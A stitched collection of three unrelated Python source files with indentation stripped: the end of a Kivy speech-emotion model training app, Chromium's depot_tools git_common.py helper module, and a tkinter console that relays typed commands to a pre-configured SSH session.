emotion = self.ids.emotionDropList.text
timeStr = time.strftime("%Y.%m.%d_%H.%M.%S")
#rename temp file if exists
if os.path.exists(f"{CURRENT_DIR}\\data\\User\\{self.clipName}.wav"):
os.rename(f"{CURRENT_DIR}\\data\\User\\{self.clipName}.wav", f"{CURRENT_DIR}\\data\\User\\{timeStr}-{emotion.lower()}.wav")
popupMsg = PopUp()
popupMsg.setText("Voice sample saved.")
popupMsg.open()
def retrainBtnPress(self, instance):
if not self.isRecording:
#open training screen
app.screenManager.current = "Train"
def sliderUpdateLabelValue(self):
value = self.ids.recordLengthSlider.value
self.ids.recordLengthLabel.text = f"{value:.1f} seconds"
class TrainPage(Widget):
def __init__(self, **kwargs):
self.buildLists()
super(TrainPage, self).__init__(**kwargs)
def buildLists(self):
self.NN_MODELS = loadModels()
self.DATASETS = ['RAVDESS-TESS', 'RAVDESS', 'TESS', 'RAVDESS-User', 'User']
self.currentTime = time.strftime("%Y.%m.%d")
#self.learningRates = [10**n *1e-8 for n in range(1, 6)]
self.isTraining = False
def returnBtnPress(self, instance):
app.startPage.updateModelList()
app.screenManager.current = "Start"
def trainBtnPress(self):
if self.isTraining:
popupMsg = PopUp()
popupMsg.setText("Please be patient as the model is being trained. Training depends on the amount of time and the speed of Hard Drive during loading of audio files.")
popupMsg.open()
return
#load settings
modelName = self.ids.modelNameInput.text.rstrip()
dataset = self.ids.datasetTrainList.text
testSplit = self.ids.dataSplitSlider.value
batch = int(self.ids.batchSlider.value)
epochs = int(round(self.ids.epochSlider.value))
activationFunction = self.ids.activationFuncInput.text.rstrip()
learningRate = self.ids.lrSlider.value
layer1 = int(self.ids.layer1Slider.value)
layer2 = int(self.ids.layer2Slider.value)
layer3 = int(self.ids.layer3Slider.value)
#sanitise inputs
if modelName == "":
popupMsg = PopUp()
popupMsg.setText("Must enter a name for your model.")
popupMsg.open()
return
modelName = f"{modelName}-{dataset}"
if modelName in self.NN_MODELS:
popupMsg = PopUp()
popupMsg.setText("Please enter a unique name for your model.\nModel with identical name will overwrite previous.")
popupMsg.open()
return
if dataset not in self.DATASETS:
popupMsg = PopUp()
popupMsg.setText("Please select a Dataset to train the network on.\nDatasets separated by hyphens will be merged before training.")
popupMsg.open()
return
if activationFunction not in validFunctions:
popupMsg = PopUp()
popupMsg.setText("Activation function not valid. Refer to https://keras.io/activations/ for list.")
popupMsg.open()
return
#build config dictionary
self.config = {
'dataset':dataset,
'test_split':testSplit,
'batch_size':batch,
'epochs':epochs,
'activation_function':activationFunction,
'learning_rate':learningRate,
'layer_1': layer1,
'layer_2': layer2,
'layer_3': layer3
}
self.ids.trainBtn.background_normal = 'icn/save_green.png'
self.isTraining = True
threading.Thread(target=self.trainModel).start()
def trainModel(self):
modelName = self.ids.modelNameInput.text.rstrip()
dataset = self.ids.datasetTrainList.text
modelName = f"{modelName}-{dataset}"
epochs = int(self.ids.epochSlider.value)
#pass config to train funciton
history = train.trainModel(modelName, self.config)
if history == None:
self.ids.trainLabel.text = "Exception caught during training. Please ensure you have tensorflow and keras installed."
self.isTraining = False
self.ids.trainBtn.background_normal = 'icn/save_blue.png'
return
#display validation accuracy for last epoch
accuracy = history['categorical_accuracy'][-1]
valAccuracy = history['val_categorical_accuracy'][-1]
print(valAccuracy)
self.ids.trainLabel.text = f"Training completed after {epochs} epochs: Training accuracy: {accuracy*100:.2f}% Validation Accuracy: {valAccuracy*100:.2f}%\nModel saved at /models/{modelName}"
#reload list of models.
app.startPage.updateModelList()
self.isTraining = False
self.ids.trainBtn.background_normal = 'icn/save_blue.png'
class PopUp(Popup):
def setText(self, text):
self.Text = text
class SREApp(App):
def build(self):
self.screenManager = ScreenManager()
self.startPage = StartPage()
screen = Screen(name="Start")
screen.add_widget(self.startPage)
self.screenManager.add_widget(screen)
self.trainPage = TrainPage()
screen = Screen(name="Train")
screen.add_widget(self.trainPage)
self.screenManager.add_widget(screen)
return self.screenManager
#return StartPage()
if __name__=='__main__':
app = SREApp()
app.run()
#cleanup temp files
if os.path.exists(f"{CURRENT_DIR}\\data\\User\\tempClip.wav"):
os.remove(f"{CURRENT_DIR}\\data\\User\\tempClip.wav")
|
git_common.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Monkeypatch IMapIterator so that Ctrl-C can kill everything properly.
# Derived from https://gist.github.com/aljungberg/626518
import multiprocessing.pool
from multiprocessing.pool import IMapIterator
def wrapper(func):
def wrap(self, timeout=None):
return func(self, timeout=timeout or 1e100)
return wrap
IMapIterator.next = wrapper(IMapIterator.next)
IMapIterator.__next__ = IMapIterator.next
# TODO(iannucci): Monkeypatch all other 'wait' methods too.
import binascii
import collections
import contextlib
import functools
import logging
import os
import re
import setup_color
import shutil
import signal
import sys
import tempfile
import textwrap
import threading
import subprocess2
from StringIO import StringIO
ROOT = os.path.abspath(os.path.dirname(__file__))
IS_WIN = sys.platform == 'win32'
GIT_EXE = ROOT+'\\git.bat' if IS_WIN else 'git'
TEST_MODE = False
FREEZE = 'FREEZE'
FREEZE_SECTIONS = {
'indexed': 'soft',
'unindexed': 'mixed'
}
FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, '|'.join(FREEZE_SECTIONS)))
# Retry a git operation if git returns a error response with any of these
# messages. It's all observed 'bad' GoB responses so far.
#
# This list is inspired/derived from the one in ChromiumOS's Chromite:
# <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS
#
# It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'.
GIT_TRANSIENT_ERRORS = (
# crbug.com/285832
r'!.*\[remote rejected\].*\(error in hook\)',
# crbug.com/289932
r'!.*\[remote rejected\].*\(failed to lock\)',
# crbug.com/307156
r'!.*\[remote rejected\].*\(error in Gerrit backend\)',
# crbug.com/285832
r'remote error: Internal Server Error',
# crbug.com/294449
r'fatal: Couldn\'t find remote ref ',
# crbug.com/220543
r'git fetch_pack: expected ACK/NAK, got',
# crbug.com/189455
r'protocol error: bad pack header',
# crbug.com/202807
r'The remote end hung up unexpectedly',
# crbug.com/298189
r'TLS packet with unexpected length was received',
# crbug.com/187444
r'RPC failed; result=\d+, HTTP code = \d+',
# crbug.com/388876
r'Connection timed out',
# crbug.com/430343
# TODO(dnj): Resync with Chromite.
r'The requested URL returned error: 5\d+',
)
GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS),
re.IGNORECASE)
# git's for-each-ref command first supported the upstream:track token in its
# format string in version 1.9.0, but some usages were broken until 2.3.0.
# See git commit b6160d95 for more information.
MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3)
class BadCommitRefException(Exception):
def __init__(self, refs):
msg = ('one of %s does not seem to be a valid commitref.' %
str(refs))
super(BadCommitRefException, self).__init__(msg)
def memoize_one(**kwargs):
"""Memoizes a single-argument pure function.
Values of None are not cached.
Kwargs:
threadsafe (bool) - REQUIRED. Specifies whether to use locking around
cache manipulation functions. This is a kwarg so that users of memoize_one
are forced to explicitly and verbosely pick True or False.
Adds three methods to the decorated function:
* get(key, default=None) - Gets the value for this key from the cache.
* set(key, value) - Sets the value for this key from the cache.
* clear() - Drops the entire contents of the cache. Useful for unittests.
* update(other) - Updates the contents of the cache from another dict.
"""
assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}'
threadsafe = kwargs['threadsafe']
if threadsafe:
def withlock(lock, f):
def inner(*args, **kwargs):
with lock:
return f(*args, **kwargs)
return inner
else:
def withlock(_lock, f):
return f
def decorator(f):
# Instantiate the lock in decorator, in case users of memoize_one do:
#
# memoizer = memoize_one(threadsafe=True)
#
# @memoizer
# def fn1(val): ...
#
# @memoizer
# def fn2(val): ...
lock = threading.Lock() if threadsafe else None
cache = {}
_get = withlock(lock, cache.get)
_set = withlock(lock, cache.__setitem__)
@functools.wraps(f)
def inner(arg):
ret = _get(arg)
if ret is None:
ret = f(arg)
if ret is not None:
_set(arg, ret)
return ret
inner.get = _get
inner.set = _set
inner.clear = withlock(lock, cache.clear)
inner.update = withlock(lock, cache.update)
return inner
return decorator
def _ScopedPool_initer(orig, orig_args): # pragma: no cover
"""Initializer method for ScopedPool's subprocesses.
This helps ScopedPool handle Ctrl-C's correctly.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
if orig:
orig(*orig_args)
@contextlib.contextmanager
def ScopedPool(*args, **kwargs):
"""Context Manager which returns a multiprocessing.pool instance which
correctly deals with thrown exceptions.
*args - Arguments to multiprocessing.pool
Kwargs:
kind ('threads', 'procs') - The type of underlying coprocess to use.
**etc - Arguments to multiprocessing.pool
"""
if kwargs.pop('kind', None) == 'threads':
pool = multiprocessing.pool.ThreadPool(*args, **kwargs)
else:
orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ())
kwargs['initializer'] = _ScopedPool_initer
kwargs['initargs'] = orig, orig_args
pool = multiprocessing.pool.Pool(*args, **kwargs)
try:
yield pool
pool.close()
except:
pool.terminate()
raise
finally:
pool.join()
class ProgressPrinter(object):
"""Threaded single-stat status message printer."""
def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5):
"""Create a ProgressPrinter.
Use it as a context manager which produces a simple 'increment' method:
with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc:
for i in xrange(1000):
# do stuff
if i % 10 == 0:
inc(10)
Args:
fmt - String format with a single '%(count)d' where the counter value
should go.
enabled (bool) - If this is None, will default to True if
logging.getLogger() is set to INFO or more verbose.
fout (file-like) - The stream to print status messages to.
period (float) - The time in seconds for the printer thread to wait
between printing.
"""
self.fmt = fmt
if enabled is None: # pragma: no cover
self.enabled = logging.getLogger().isEnabledFor(logging.INFO)
else:
self.enabled = enabled
self._count = 0
self._dead = False
self._dead_cond = threading.Condition()
self._stream = fout
self._thread = threading.Thread(target=self._run)
self._period = period
def _emit(self, s):
if self.enabled:
self._stream.write('\r' + s)
self._stream.flush()
def _run(self):
with self._dead_cond:
while not self._dead:
self._emit(self.fmt % {'count': self._count})
self._dead_cond.wait(self._period)
self._emit((self.fmt + '\n') % {'count': self._count})
def inc(self, amount=1):
self._count += amount
def __enter__(self):
self._thread.start()
return self.inc
def __exit__(self, _exc_type, _exc_value, _traceback):
self._dead = True
with self._dead_cond:
self._dead_cond.notifyAll()
self._thread.join()
del self._thread
def once(function):
"""@Decorates |function| so that it only performs its action once, no matter
how many times the decorated |function| is called."""
def _inner_gen():
yield function()
while True:
yield
return _inner_gen().next
## Git functions
def die(message, *args):
print >> sys.stderr, textwrap.dedent(message % args)
sys.exit(1)
def blame(filename, revision=None, porcelain=False, *_args):
command = ['blame']
if porcelain:
command.append('-p')
if revision is not None:
command.append(revision)
command.extend(['--', filename])
return run(*command)
def branch_config(branch, option, default=None):
return get_config('branch.%s.%s' % (branch, option), default=default)
def branch_config_map(option):
"""Return {branch: <|option| value>} for all branches."""
try:
reg = re.compile(r'^branch\.(.*)\.%s$' % option)
lines = get_config_regexp(reg.pattern)
return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)}
except subprocess2.CalledProcessError:
return {}
def branches(*args):
NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached')
key = 'depot-tools.branch-limit'
limit = get_config_int(key, 20)
raw_branches = run('branch', *args).splitlines()
num = len(raw_branches)
if num > limit:
die("""\
Your git repo has too many branches (%d/%d) for this tool to work well.
You may adjust this limit by running:
git config %s <new_limit>
You may also try cleaning up your old branches by running:
git cl archive
""", num, limit, key)
for line in raw_branches:
if line.startswith(NO_BRANCH):
continue
yield line.split()[-1]
def get_config(option, default=None):
try:
return run('config', '--get', option) or default
except subprocess2.CalledProcessError:
return default
def get_config_int(option, default=0):
assert isinstance(default, int)
try:
return int(get_config(option, default))
except ValueError:
return default
def get_config_list(option):
try:
return run('config', '--get-all', option).split()
except subprocess2.CalledProcessError:
return []
def get_config_regexp(pattern):
if IS_WIN: # pragma: no cover
# this madness is because we call git.bat which calls git.exe which calls
# bash.exe (or something to that effect). Each layer divides the number of
# ^'s by 2.
pattern = pattern.replace('^', '^' * 8)
return run('config', '--get-regexp', pattern).splitlines()
def current_branch():
try:
return run('rev-parse', '--abbrev-ref', 'HEAD')
except subprocess2.CalledProcessError:
return None
def del_branch_config(branch, option, scope='local'):
del_config('branch.%s.%s' % (branch, option), scope=scope)
def del_config(option, scope='local'):
try:
run('config', '--' + scope, '--unset', option)
except subprocess2.CalledProcessError:
pass
def diff(oldrev, newrev, *args):
return run('diff', oldrev, newrev, *args)
def freeze():
took_action = False
key = 'depot-tools.freeze-size-limit'
MB = 2**20
limit_mb = get_config_int(key, 100)
untracked_bytes = 0
for f, s in status():
if is_unmerged(s):
die("Cannot freeze unmerged changes!")
if limit_mb > 0:
if s.lstat == '?':
untracked_bytes += os.stat(f).st_size
if untracked_bytes > limit_mb * MB:
die("""\
You appear to have too much untracked+unignored data in your git
checkout: %.1f / %d MB.
Run `git status` to see what it is.
In addition to making many git commands slower, this will prevent
depot_tools from freezing your in-progress changes.
You should add untracked data that you want to ignore to your repo's
.git/info/excludes
file. See `git help ignore` for the format of this file.
If this data is indended as part of your commit, you may adjust the
freeze limit by running:
git config %s <new_limit>
Where <new_limit> is an integer threshold in megabytes.""",
untracked_bytes / (MB * 1.0), limit_mb, key)
try:
run('commit', '--no-verify', '-m', FREEZE + '.indexed')
took_action = True
except subprocess2.CalledProcessError:
pass
add_errors = False
try:
run('add', '-A', '--ignore-errors')
except subprocess2.CalledProcessError:
add_errors = True
try:
run('commit', '--no-verify', '-m', FREEZE + '.unindexed')
took_action = True
except subprocess2.CalledProcessError:
pass
ret = []
if add_errors:
ret.append('Failed to index some unindexed files.')
if not took_action:
ret.append('Nothing to freeze.')
return ' '.join(ret) or None
def get_branch_tree():
"""Get the dictionary of {branch: parent}, compatible with topo_iter.
Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of
branches without upstream branches defined.
"""
skipped = set()
branch_tree = {}
for branch in branches():
parent = upstream(branch)
if not parent:
skipped.add(branch)
continue
branch_tree[branch] = parent
return skipped, branch_tree
def get_or_create_merge_base(branch, parent=None):
"""Finds the configured merge base for branch.
If parent is supplied, it's used instead of calling upstream(branch).
"""
base = branch_config(branch, 'base')
base_upstream = branch_config(branch, 'base-upstream')
parent = parent or upstream(branch)
if parent is None or branch is None:
return None
actual_merge_base = run('merge-base', parent, branch)
if base_upstream != parent:
base = None
base_upstream = None
def is_ancestor(a, b):
return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0
if base and base != actual_merge_base:
if not is_ancestor(base, branch):
logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base)
base = None
elif is_ancestor(base, actual_merge_base):
logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base)
base = None
else:
logging.debug('Found pre-set merge-base for %s: %s', branch, base)
if not base:
base = actual_merge_base
manual_merge_base(branch, base, parent)
return base
def hash_multi(*reflike):
return run('rev-parse', *reflike).splitlines()
def hash_one(reflike, short=False):
args = ['rev-parse', reflike]
if short:
args.insert(1, '--short')
return run(*args)
def in_rebase():
git_dir = run('rev-parse', '--git-dir')
return (
os.path.exists(os.path.join(git_dir, 'rebase-merge')) or
os.path.exists(os.path.join(git_dir, 'rebase-apply')))
def intern_f(f, kind='blob'):
"""Interns a file object into the git object store.
Args:
f (file-like object) - The file-like object to intern
kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'.
Returns the git hash of the interned object (hex encoded).
"""
ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f)
f.close()
return ret
def is_dormant(branch):
# TODO(iannucci): Do an oldness check?
return branch_config(branch, 'dormant', 'false') != 'false'
def is_unmerged(stat_value):
return (
'U' in (stat_value.lstat, stat_value.rstat) or
((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD')
)
def manual_merge_base(branch, base, parent):
set_branch_config(branch, 'base', base)
set_branch_config(branch, 'base-upstream', parent)
def mktree(treedict):
"""Makes a git tree object and returns its hash.
See |tree()| for the values of mode, type, and ref.
Args:
treedict - { name: (mode, type, ref) }
"""
with tempfile.TemporaryFile() as f:
for name, (mode, typ, ref) in treedict.iteritems():
f.write('%s %s %s\t%s\0' % (mode, typ, ref, name))
f.seek(0)
return run('mktree', '-z', stdin=f)
def parse_commitrefs(*commitrefs):
"""Returns binary encoded commit hashes for one or more commitrefs.
A commitref is anything which can resolve to a commit. Popular examples:
* 'HEAD'
* 'origin/master'
* 'cool_branch~2'
"""
try:
return map(binascii.unhexlify, hash_multi(*commitrefs))
except subprocess2.CalledProcessError:
raise BadCommitRefException(commitrefs)
RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr')
def rebase(parent, start, branch, abort=False):
"""Rebases |start|..|branch| onto the branch |parent|.
Args:
parent - The new parent ref for the rebased commits.
start - The commit to start from
branch - The branch to rebase
abort - If True, will call git-rebase --abort in the event that the rebase
doesn't complete successfully.
Returns a namedtuple with fields:
success - a boolean indicating that the rebase command completed
successfully.
message - if the rebase failed, this contains the stdout of the failed
rebase.
"""
try:
args = ['--onto', parent, start, branch]
if TEST_MODE:
args.insert(0, '--committer-date-is-author-date')
run('rebase', *args)
return RebaseRet(True, '', '')
except subprocess2.CalledProcessError as cpe:
if abort:
run_with_retcode('rebase', '--abort') # ignore failure
return RebaseRet(False, cpe.stdout, cpe.stderr)
def remove_merge_base(branch):
del_branch_config(branch, 'base')
del_branch_config(branch, 'base-upstream')
def repo_root():
"""Returns the absolute path to the repository root."""
return run('rev-parse', '--show-toplevel')
def root():
return get_config('depot-tools.upstream', 'origin/master')
@contextlib.contextmanager
def less(): # pragma: no cover
"""Runs 'less' as context manager yielding its stdin as a PIPE.
Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids
running less and just yields sys.stdout.
"""
if not setup_color.IS_TTY:
yield sys.stdout
return
# Run with the same options that git uses (see setup_pager in git repo).
# -F: Automatically quit if the output is less than one screen.
# -R: Don't escape ANSI color codes.
# -X: Don't clear the screen before starting.
cmd = ('less', '-FRX')
try:
proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE)
yield proc.stdin
finally:
proc.stdin.close()
proc.wait()
def run(*cmd, **kwargs):
"""The same as run_with_stderr, except it only returns stdout."""
return run_with_stderr(*cmd, **kwargs)[0]
def run_with_retcode(*cmd, **kwargs):
"""Run a command but only return the status code."""
try:
run(*cmd, **kwargs)
return 0
except subprocess2.CalledProcessError as cpe:
return cpe.returncode
def run_stream(*cmd, **kwargs):
"""Runs a git command. Returns stdout as a PIPE (file-like object).
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
return proc.stdout
@contextlib.contextmanager
def run_stream_with_retcode(*cmd, **kwargs):
"""Runs a git command as context manager yielding stdout as a PIPE.
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
Raises subprocess2.CalledProcessError on nonzero return code.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
try:
proc = subprocess2.Popen(cmd, **kwargs)
yield proc.stdout
finally:
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(),
None, None)
def run_with_stderr(*cmd, **kwargs):
"""Runs a git command.
Returns (stdout, stderr) as a pair of strings.
kwargs
autostrip (bool) - Strip the output. Defaults to True.
indata (str) - Specifies stdin data for the process.
"""
kwargs.setdefault('stdin', subprocess2.PIPE)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('stderr', subprocess2.PIPE)
kwargs.setdefault('shell', False)
autostrip = kwargs.pop('autostrip', True)
indata = kwargs.pop('indata', None)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
ret, err = proc.communicate(indata)
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err)
if autostrip:
ret = (ret or '').strip()
err = (err or '').strip()
return ret, err
def set_branch_config(branch, option, value, scope='local'):
set_config('branch.%s.%s' % (branch, option), value, scope=scope)
def set_config(option, value, scope='local'):
run('config', '--' + scope, option, value)
def get_dirty_files():
# Make sure index is up-to-date before running diff-index.
run_with_retcode('update-index', '--refresh', '-q')
return run('diff-index', '--name-status', 'HEAD')
def is_dirty_git_tree(cmd):
dirty = get_dirty_files()
if dirty:
print 'Cannot %s with a dirty tree. You must commit locally first.' % cmd
print 'Uncommitted files: (git diff-index --name-status HEAD)'
print dirty[:4096]
if len(dirty) > 4096: # pragma: no cover
print '... (run "git diff-index --name-status HEAD" to see full output).'
return True
return False
def status():
"""Returns a parsed version of git-status.
Returns a generator of (current_name, (lstat, rstat, src)) pairs where:
* current_name is the name of the file
* lstat is the left status code letter from git-status
* rstat is the left status code letter from git-status
* src is the current name of the file, or the original name of the file
if lstat == 'R'
"""
stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src')
def tokenizer(stream):
acc = StringIO()
c = None
while c != '':
c = stream.read(1)
if c in (None, '', '\0'):
if acc.len:
yield acc.getvalue()
acc = StringIO()
else:
acc.write(c)
def parser(tokens):
while True:
# Raises StopIteration if it runs out of tokens.
status_dest = next(tokens)
stat, dest = status_dest[:2], status_dest[3:]
lstat, rstat = stat
if lstat == 'R':
src = next(tokens)
else:
src = dest
yield (dest, stat_entry(lstat, rstat, src))
return parser(tokenizer(run_stream('status', '-z', bufsize=-1)))
def squash_current_branch(header=None, merge_base=None):
header = header or 'git squash commit.'
merge_base = merge_base or get_or_create_merge_base(current_branch())
log_msg = header + '\n'
if log_msg:
log_msg += '\n'
log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base)
run('reset', '--soft', merge_base)
if not get_dirty_files():
# Sometimes the squash can result in the same tree, meaning that there is
# nothing to commit at this point.
print 'Nothing to commit; squashed branch is empty'
return False
run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg)
return True
def tags(*args):
return run('tag', *args).splitlines()
def thaw():
took_action = False
for sha in (s.strip() for s in run_stream('rev-list', 'HEAD').xreadlines()):
msg = run('show', '--format=%f%b', '-s', 'HEAD')
match = FREEZE_MATCHER.match(msg)
if not match:
if not took_action:
return 'Nothing to thaw.'
break
run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha)
took_action = True
def topo_iter(branch_tree, top_down=True):
"""Generates (branch, parent) in topographical order for a branch tree.
Given a tree:
A1
B1 B2
C1 C2 C3
D1
branch_tree would look like: {
'D1': 'C3',
'C3': 'B2',
'B2': 'A1',
'C1': 'B1',
'C2': 'B1',
'B1': 'A1',
}
It is OK to have multiple 'root' nodes in your graph.
if top_down is True, items are yielded from A->D. Otherwise they're yielded
from D->A. Within a layer the branches will be yielded in sorted order.
"""
branch_tree = branch_tree.copy()
# TODO(iannucci): There is probably a more efficient way to do these.
if top_down:
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if p not in branch_tree]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
del branch_tree[branch]
else:
parent_to_branches = collections.defaultdict(set)
for branch, parent in branch_tree.iteritems():
parent_to_branches[parent].add(branch)
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if not parent_to_branches[b]]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
parent_to_branches[parent].discard(branch)
del branch_tree[branch]
def tree(treeref, recurse=False):
"""Returns a dict representation of a git tree object.
Args:
treeref (str) - a git ref which resolves to a tree (commits count as trees).
recurse (bool) - include all of the tree's decendants too. File names will
take the form of 'some/path/to/file'.
Return format:
{ 'file_name': (mode, type, ref) }
mode is an integer where:
* 0040000 - Directory
* 0100644 - Regular non-executable file
* 0100664 - Regular non-executable group-writeable file
* 0100755 - Regular executable file
* 0120000 - Symbolic link
* 0160000 - Gitlink
type is a string where it's one of 'blob', 'commit', 'tree', 'tag'.
ref is the hex encoded hash of the entry.
"""
ret = {}
opts = ['ls-tree', '--full-tree']
if recurse:
opts.append('-r')
opts.append(treeref)
try:
for line in run(*opts).splitlines():
mode, typ, ref, name = line.split(None, 3)
ret[name] = (mode, typ, ref)
except subprocess2.CalledProcessError:
return None
return ret
def upstream(branch):
try:
return run('rev-parse', '--abbrev-ref', '--symbolic-full-name',
branch+'@{upstream}')
except subprocess2.CalledProcessError:
return None
def get_git_version():
"""Returns a tuple that contains the numeric components of the current git
version."""
version_string = run('--version')
version_match = re.search(r'(\d+.)+(\d+)', version_string)
version = version_match.group() if version_match else ''
return tuple(int(x) for x in version.split('.'))
def get_branches_info(include_tracking_status):
format_string = (
'--format=%(refname:short):%(objectname:short):%(upstream:short):')
# This is not covered by the depot_tools CQ which only has git version 1.8.
if (include_tracking_status and
get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover
format_string += '%(upstream:track)'
info_map = {}
data = run('for-each-ref', format_string, 'refs/heads')
BranchesInfo = collections.namedtuple(
'BranchesInfo', 'hash upstream ahead behind')
for line in data.splitlines():
(branch, branch_hash, upstream_branch, tracking_status) = line.split(':')
ahead_match = re.search(r'ahead (\d+)', tracking_status)
ahead = int(ahead_match.group(1)) if ahead_match else None
behind_match = re.search(r'behind (\d+)', tracking_status)
behind = int(behind_match.group(1)) if behind_match else None
info_map[branch] = BranchesInfo(
hash=branch_hash, upstream=upstream_branch, ahead=ahead, behind=behind)
# Set None for upstreams which are not branches (e.g empty upstream, remotes
# and deleted upstream branches).
missing_upstreams = {}
for info in info_map.values():
if info.upstream not in info_map and info.upstream not in missing_upstreams:
missing_upstreams[info.upstream] = None
return dict(info_map.items() + missing_upstreams.items())
def make_workdir_common(repository, new_workdir, files_to_symlink,
files_to_copy, symlink=None):
if not symlink:
symlink = os.symlink
os.makedirs(new_workdir)
for entry in files_to_symlink:
clone_file(repository, new_workdir, entry, symlink)
for entry in files_to_copy:
clone_file(repository, new_workdir, entry, shutil.copy)
def make_workdir(repository, new_workdir):
GIT_DIRECTORY_WHITELIST = [
'config',
'info',
'hooks',
'logs/refs',
'objects',
'packed-refs',
'refs',
'remotes',
'rr-cache',
'svn'
]
make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST,
['HEAD'])
def clone_file(repository, new_workdir, link, operation):
if not os.path.exists(os.path.join(repository, link)):
return
link_dir = os.path.dirname(os.path.join(new_workdir, link))
if not os.path.exists(link_dir):
os.makedirs(link_dir)
operation(os.path.join(repository, link), os.path.join(new_workdir, link))
|
console.py
|
import subprocess
import queue
import threading
import tkinter as tk
from tkinter.font import Font
from tkinter.scrolledtext import ScrolledText
from tkinter import N, S, E, W
from config import CommandsConfig
config = CommandsConfig()
class Console:
def __init__(self, frame):
self.frame = frame
self.process = None
self.cmd = tk.StringVar()
self.queue = queue.Queue()
self.thread = None
self.font = Font(family='Courier New', name='outputFont', size=16, weight='normal')
self.bg = '#121212'
self.fg = '#32CD32'
self.init_input()
self.init_output()
self.login()
self.frame.after(100, self.get_output)
def init_input(self):
# input container grid
self.input_container = tk.Frame(self.frame)
self.input_container.grid(row=1, column=0, sticky=N+W, padx=20, pady=0)
self.input_container.config(bg=self.bg)
tk.Grid.rowconfigure(self.input_container, 0, weight=1)
tk.Grid.rowconfigure(self.input_container, 1, weight=1)
tk.Grid.columnconfigure(self.input_container, 0, weight=1)
# input label text
label = tk.Label(self.input_container, text='Input:', bg=self.bg, fg=self.fg, font=self.font)
label.grid(row=0, column=0, sticky=N+W)
# input entry
self.entry = tk.Entry(self.input_container, bg=self.bg, fg=self.fg, font=self.font)
self.entry.grid(row=1, column=0)
self.entry["textvariable"] = self.cmd
self.entry.bind('<Key-Return>', self.enter_command)
def init_output(self):
# output label frame
self.window = tk.LabelFrame(self.frame, text='Output:', height="1300px", bg=self.bg, fg=self.fg, font=self.font)
self.window.grid(row=2, column=0, sticky=N+S+E+W, padx=20, pady=20)
tk.Grid.columnconfigure(self.window, 0, weight=1)
tk.Grid.rowconfigure(self.window, 0, weight=1)
tk.Grid.rowconfigure(self.window, 1, weight=2)
# scrolled text output
self.scrolled_text = ScrolledText(self.window, state='disabled', height=36)
self.scrolled_text.grid(row=0, column=0, sticky=N+S+E+W, padx=15, pady=15)
self.scrolled_text.configure(background='#121212', foreground='#32CD32', font=self.font, wrap='word')
def login(self):
# ssh into server via pre-configured executable script
self.process = subprocess.Popen(['droplet'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
start_new_session=True)
t = threading.Thread(target=self.output_reader, args=(self.process,))
t._stop_event = threading.Event()
self.thread = t
self.thread.start()
def output_reader(self, proc):
for line in iter(proc.stdout.readline, b''):
self.queue.put(line.decode('utf-8'))
def get_output(self):
while True:
try:
record = self.queue.get(block=False)
except queue.Empty:
break
else:
self.show_message(message=record)
self.frame.after(100, self.get_output)
def show_message(self, message):
self.scrolled_text.configure(state='normal')
self.scrolled_text.insert(tk.END, message)
self.scrolled_text.configure(state='disabled')
#self.scrolled_text.yview(tk.END)
def flush_output(self):
self.process.stdout.flush()
self.scrolled_text.configure(state='normal')
self.scrolled_text.delete(1.0, tk.END)
self.scrolled_text.configure(state='disabled')
return
def enter_command(self, event):
try:
cmd = self.cmd.get()
bytestr = bytes(f'{cmd}\n', encoding='utf-8')
self.flush_output()
self.process.stdin.write(bytestr)
self.process.stdin.flush()
self.frame.after(100, self.get_output)
self.cmd.set('')
except Exception as e:
print(f'Caught exception: {e}')
def check_status(self):
self.flush_output()
